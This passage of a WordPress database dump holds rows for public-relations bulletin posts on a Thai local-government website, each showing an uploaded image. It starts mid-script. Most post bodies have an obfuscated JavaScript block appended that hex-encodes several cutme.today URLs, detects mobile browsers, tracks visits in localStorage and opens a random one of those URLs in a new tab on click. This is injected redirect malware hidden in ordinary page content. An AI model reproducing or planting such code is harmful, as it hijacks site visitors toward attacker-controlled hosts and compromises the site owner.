)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','218-revision-v1','','','2024-07-27 22:45:20','2024-07-27 15:45:20','',218,'http://pakhaeng.ssk.in.th/?p=220',0,'revision','',0),
(221,1,'2024-07-27 22:45:48','2024-07-27 15:45:48','<!-- wp:image {\"id\":222,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/11-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-222\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-12','','','2024-07-27 22:45:50','2024-07-27 15:45:50','',0,'http://pakhaeng.ssk.in.th/?p=221',0,'post','',0),
(222,1,'2024-07-27 22:45:37','2024-07-27 15:45:37','','11-2566','','inherit','','closed','','11-2566-2','','','2024-07-27 22:45:37','2024-07-27 15:45:37','',221,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/11-2566-1.png',0,'attachment','image/png',0),
(223,1,'2024-07-27 22:45:48','2024-07-27 15:45:48','<!-- wp:image {\"id\":222,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/11-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-222\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','221-revision-v1','','','2024-07-27 22:45:48','2024-07-27 15:45:48','',221,'http://pakhaeng.ssk.in.th/?p=223',0,'revision','',0),
